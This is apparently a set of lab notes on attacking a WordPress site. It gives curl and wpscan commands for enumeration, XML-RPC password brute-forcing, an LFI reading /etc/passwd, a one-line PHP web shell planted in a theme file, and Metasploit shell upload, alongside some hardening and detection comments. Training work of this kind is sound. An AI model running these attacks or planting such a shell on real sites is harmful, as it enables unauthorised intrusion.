# WordPress

{% hint style="info" %}

```shell-session
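# Password attack over xmlrpc.php. -U takes a comma-separated list with no space:
# "admin, david" is split by the shell into "admin," plus a stray argument.
wpscan --password-attack xmlrpc -t 20 -U admin,david -P passwords.txt --url http://blog.inlanefreight.com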

```

{% endhint %}

```
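# Notes use '#' comments so the listing is valid shell ('//' is not a comment and
# the embedded PHP below is shown as a comment rather than as shell input).

# --- Unauthenticated enumeration ---

# Plugin paths referenced in the page source (the original comment said "wp version",
# but this lists plugins; the trailing '*' is a regex quantifier on '/', not a glob).
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2
# Same approach for themes.
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2

# User enumeration via the author-ID redirect (the Location header in the
# response usually reveals the user slug).
curl -s -I -X GET http://blog.inlanefreight.com/?author=1

# Second method: user enumeration via the REST API.
# Hardening: restrict /wp-json/wp/v2/users to authenticated requests.
curl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq

# --- XML-RPC ---

# Credential validation through xmlrpc.php (wp.getUsersBlogs).
# Hardening: disable or block xmlrpc.php when the site does not need it.
# Detection: bursts of POSTs to xmlrpc.php with many distinct password values.
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php

# List the XML-RPC methods the instance exposes (line count only).
curl -i -s -k -X $'POST' -H $'Host: 138.68.163.76:32302' --data-binary $'<methodCall>\x0d\x0a<methodName>system.listMethods</methodName>\x0d\x0a<params></params>\x0d\x0a</methodCall>\x0d\x0a\x0d\x0a' 'http://138.68.163.76:32302/xmlrpc.php' | wc -l

# Full wpscan enumeration (API token redacted).
wpscan --url http://blog.inlanefreight.com --enumerate --api-token Kffr4fdJzy9qVcTk<SNIP>

# LFI in the mail-masta plugin (count_of_send.php, 'pl' parameter) used to read /etc/passwd.
# Fix: update or remove the plugin.
curl http://blog.inlanefreight.com:32302/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

# Password attack over xmlrpc. -U is a comma-separated list with no space
# ("admin, david" would be split by the shell), and --url is required.
wpscan --password-attack xmlrpc -t 20 -U admin,david -P passwords.txt --url http://blog.inlanefreight.com

# Same attack against a single user with rockyou.
wpscan --password-attack xmlrpc -t 20 -U roger -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com:30594

# --- Authenticated RCE via the theme editor ---
# The active theme is Transportex, so an unused theme such as Twenty Seventeen
# is chosen instead (Select), and a non-critical file such as 404.php is
# modified to hold the web shell. Contents written to 404.php:
#   <?php
#   system($_GET['cmd']);
# Hardening: define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the
# dashboard editor. Detection: unexpected writes under wp-content/themes/ and
# requests to theme PHP files carrying a 'cmd' parameter.

# RCE via the modified twentyseventeen theme file.
curl -X GET "http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id"

# Read the flag.
curl -X GET "http://blog.inlanefreight.com:30594/wp-content/themes/twentyseventeen/404.php?cmd=cat%20/home/wp-user/flag.txt"

# --- Metasploit (msfconsole) ---
#   search wp_admin_shell_upload
#   use 0
#   set rhosts blog.inlanefreight.com
#   set username admin
#   set password ...
#   set lhost x.x.x.x
#   run

# Vulnerable plugin identified during enumeration:
# Email Subscribers & Newsletters < 4.2.3 - Multiple Issues
# https://wpscan.com/vulnerability/a0764617-6142-4ef7-94f9-1fb923e81e94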
```

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FFa4Os3Jgd41jugcSLfGg%2Fimage.png?alt=media\&token=c64cb769-9455-4d67-abec-b56b81abec1c)

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FXBPWfLamNZMtS7OJTAb4%2Fimage.png?alt=media\&token=4226c861-e6a5-4b51-89bd-2e17a9dae7ce)

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FnuCd1dFhCun3SAhEThds%2Fimage.png?alt=media\&token=987ebf8b-6ae2-4762-8763-eeabe082b3a1)

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FeIsFbwbkbURiH60KT3zx%2Fimage.png?alt=media\&token=c815c74d-01fa-40f9-8996-2283e9e3b948)
